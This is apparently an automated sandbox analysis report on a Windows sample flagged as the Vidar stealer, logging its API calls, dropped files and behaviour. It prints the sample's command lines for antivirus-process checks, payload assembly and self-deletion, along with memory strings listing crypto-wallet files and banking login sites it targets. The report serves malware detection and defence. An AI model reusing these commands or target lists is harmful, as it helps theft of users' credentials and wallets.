                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\trZG6pItZj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Google Drive.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: trZG6pItZj.exeStatic file information: File size 1146198 > 1048576
                Source: trZG6pItZj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: trZG6pItZj.exeStatic PE information: real checksum: 0x11dc0c should be: 0x122801
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40DE6 push ecx; ret 11_2_00E40DF9

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\139308\Procedures.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\139308\Procedures.comJump to dropped file

                Boot Survival

                barindex
                Monitors registry run keys for changes
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00EB26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00EB26DD
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E3FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00E3FC7C
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comAPI coverage: 3.9 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 6600Thread sleep count: 88 > 30
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00E8DC54
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00E9A087
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00E9A1E2
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00E8E472
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00E9A570
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E966DC FindFirstFileW,FindNextFileW,FindClose,11_2_00E966DC
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E5C622 FindFirstFileExW,11_2_00E5C622
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00E973D4
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E97333 FindFirstFileW,FindClose,11_2_00E97333
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00E8D921
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E25FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00E25FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139308Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139308\Jump to behavior
                Source: DJWL6P.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: DJWL6P.11.drBinary or memory string: discord.comVMware20,11696428655f
                Source: DJWL6P.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: global block list test formVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000013.00000003.2678045932.000074D002590000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: DJWL6P.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: DJWL6P.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: DJWL6P.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: DJWL6P.11.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: DJWL6P.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: msedge.exe, 00000013.00000002.2688599797.0000019CBFC42000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2850531149.000001CDC6646000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: DJWL6P.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: DJWL6P.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: DJWL6P.11.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: DJWL6P.11.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: DJWL6P.11.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: DJWL6P.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxV4
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Procedures.com, 0000000B.00000002.3159668488.0000000006470000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                Source: DJWL6P.11.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: DJWL6P.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: DJWL6P.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9F4FF BlockInput,11_2_00E9F4FF
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E2338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00E2338B
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E45058 mov eax, dword ptr fs:[00000030h]11_2_00E45058
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,11_2_00E820AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E52992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00E52992
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00E40BAF
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40D45 SetUnhandledExceptionFilter,11_2_00E40D45
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00E40F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: Procedures.com PID: 1576, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E81B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00E81B4D
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E2338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00E2338B
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8BBED SendInput,keybd_event,11_2_00E8BBED
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8ECD0 mouse_event,11_2_00E8ECD0
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139308Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Frame" Ron Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Brochure + ..\Divine + ..\Surgery + ..\Posting jJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Procedures.com jJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\139308\Procedures.com" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_00E814AE
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E81FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00E81FB0
                Source: Procedures.com, 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp, Night.0.dr, Procedures.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Procedures.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40A08 cpuid 11_2_00E40A08
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E7E5F4 GetLocalTime,11_2_00E7E5F4
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E7E652 GetUserNameW,11_2_00E7E652
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E5BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00E5BCD2
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 11.2.Procedures.com.3fb0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Procedures.com PID: 1576, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000408D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
